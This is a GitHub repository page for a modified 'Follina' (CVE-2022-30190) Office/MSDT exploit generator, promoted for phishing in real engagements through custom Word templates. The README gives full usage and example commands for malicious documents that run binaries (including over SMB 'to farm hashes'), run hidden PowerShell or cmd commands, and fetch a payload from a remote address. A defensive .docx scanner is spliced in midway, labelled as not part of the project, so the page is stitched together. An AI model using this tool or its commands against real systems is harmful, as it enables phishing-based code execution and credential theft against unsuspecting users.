
shenghuo2 / cve-2022-30190-follina-office-msdt-fixed


This project forked from komomon/cve-2022-30190-follina-office-msdt-fixed


Modified version of CVE-2022-30190 follina.py. A custom Word template can be specified, which is convenient for phishing use in real engagements.

Home Page: https://www.cnblogs.com/forforever/

Python 47.07% HTML 26.44% Smarty 26.49%

cve-2022-30190-follina-office-msdt-fixed's Introduction

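'Follina' MS-MSDT n-day Microsoft Office RCE (modified version)

Modified from the https://github.com/chvancooten/follina.py project. A custom docx template file can be specified, which is convenient for phishing use in real engagements: edit your own phishing Word document, then pass it with the -f parameter.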

Usage:

usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Docx file Arguments:
  -f FILE, --file FILE  The docx file

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

Examples:

# The default docx is muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080
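A defender-side check for the kind of document described above, as an added example that is not part of the original project: because the generated docx retrieves its payload from a URL, the scanner below lists external http(s) relationships in a .docx that Word resolves on open without a click. The function names, the choice of relationship types (it also covers attachedTemplate, beyond the oleObject case) and the constructed sample using the TEST-NET address 192.0.2.10 are assumptions of this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
# Relationship types Word resolves on open without a click (this example's choice).
AUTO_LOADED = {"oleObject", "attachedTemplate"}
MAX_PART = 1 << 20  # skip .rels parts whose declared size is implausibly large


def remote_auto_loads(docx_bytes):
    """Return [(part, type, target)] for external http(s) links Word fetches on open."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for info in z.infolist():
            if not info.filename.endswith(".rels") or info.file_size > MAX_PART:
                continue
            data = z.read(info)
            if b"<!DOCTYPE" in data:  # OPC parts carry no DTD; report, do not parse
                hits.append((info.filename, "doctype", ""))
                continue
            for rel in ET.fromstring(data).iter(REL):
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if (rel.get("TargetMode", "").lower() == "external"
                        and kind in AUTO_LOADED
                        and target.lower().startswith(("http://", "https://"))):
                    hits.append((info.filename, kind, target))
    return hits


def constructed_sample(target):
    """Build a minimal, constructed archive holding only a .rels part (test input)."""
    ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{ns}/hyperlink" Target="https://example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{ns}/oleObject" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in remote_auto_loads(constructed_sample("http://192.0.2.10/exploit.html")):
        print(hit)
```

Ordinary hyperlinks are external relationships too, which is why the scanner filters on relationship type rather than on TargetMode alone.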


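Let's discuss

If you are interested, follow the Z2O安全攻防 WeChat official account and reply "加群" (join group), then add Z2OBot 小K, which will automatically add you to the Z2O安全攻防 discussion group, where more good material is shared.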


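The team has set up a 知识星球 (Knowledge Planet) group that posts the latest vulnerability reproductions from time to time with step-by-step guidance, and also posts POCs and internal and external network penetration testing operations from time to time. Join if you are interested.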


Stars are welcome :star: O(∩_∩)O

cve-2022-30190-follina-office-msdt-fixed's People

Contributors

komomon
